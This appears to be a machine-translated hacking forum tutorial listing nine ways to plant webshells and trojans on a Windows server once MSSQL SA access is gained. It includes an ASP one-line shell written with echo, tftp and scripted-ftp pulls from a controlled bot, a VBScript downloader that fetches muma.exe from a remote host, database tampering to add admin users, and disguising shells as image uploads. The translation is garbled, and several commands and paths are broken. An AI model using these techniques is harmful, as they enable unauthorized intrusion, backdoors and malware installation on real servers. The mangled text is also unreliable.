Nine upload methods with SA permission

SA has a lot of permissions, but some friends may feel inconvenient to use. I will discuss several methods for uploading files with you. If there are other methods, I hope you will come up with a better technical explanation, higher or higher. I. NBSI command method: Write a wooden SHELL statement. The command is as follows: echo ^ <25% execute request ("#") 25% ^> d: webmm. in this way, asp needs to write a trojan. If the trojan is soft and KILL, it can be connected. Net stop "service name" can stop the service.
Ii. NBSI3. 0 contains the file upload function, which can also be used. Disadvantages: slow speed. We recommend that you upload a short WEBSHELL.
3. merge a Trojan with the database, and then use the differential backup function of the NBSI database.
4. If the website has a forum and the attachment upload function is available, you can directly upload files on the Forum (Change WEBSHELL to possible file types such as JPG and GIF)
5. Use NBSI and other injection tools to browse the website database connection files (the prerequisite database and the WEB are on one machine, which can be determined by IPCNFIG/ALL command) to find the SA connection password. Use the Event Query analyzer that comes with MSSQL2000 to connect several database machines and find the background password by browsing the database. If MD5 can be changed using the Update statement, you can also use Insert to add a new user, you do not need to crack MD5 and enter the background to find the WEBSHELL upload method.
6. tftp Command method: TFTP [-I] host [GET | PUT] source [destination] First open the TFTP service on your machine or the controlled broiler. The tool is as follows: TFTP32.EXE is good. For example, if the bot IP address 192.168.1.1 has the SA permission on the machine is 192.168.1.2, run the command: tftp-I 192.168.1.1 get webshell. asp d: webwebshell. if asp succeeds, a file: webshell will be generated in the web directory of disk D of 192.168.1.2. asp
VII. ftp method: the premise is that there is an accessible Internet FTP space (). Command ECHO command, the method described earlier: generate a file ftp.txt on the target machine
Echo open ftp. TXT "> www.ftp.com> ftp. TXT // connect to FTP
Echo username> ftp. TXT // enter the user name
Echo password> ftp. TXT // enter the password
Echo get webshell. asp d: webwebshell. asp> ftp. TXT // run the download command.
Echo bye> ftp. TXT // exit
Ftp-s: ftp.txt // execute the FTP command in the FTP. TXT file
8. vbs script method:
Use the ECHO command to write the file: get. vbs. The content is as follows:
On Error Resume Next
Dim iRemote, iLocal
ILocal = LCase (WScript. Arguments (1 ))
IRemote = LCase (WScript. Arguments (0 ))
Set xPost = createObject ("Microsoft. XMLHTTP ")
XPost. Open "GET", iRemote, 0
XPost. Send ()
Set sGet = createObject ("ADODB. Stream ")
SGet. Mode = 3
SGet. Type = 1
SGet. Open ()
SGet. Write (xPost. responseBody)
SGet. SaveToFile iLocal, 2
Run cscript get. vbs http: // ip/muma.exe c: muma.exe in the command line.
9. The start command method is not commonly used, but it is also a method,
Start html "> http: // ip/a.htmlthe a.html file is stored in a timely packet. If we change the program name to a.jpg and embed it in a.html, the file can be downloaded to the IE cache. You can use dir/s a *. jpg to search. If it is found, you can use the COPY command to COPY it out.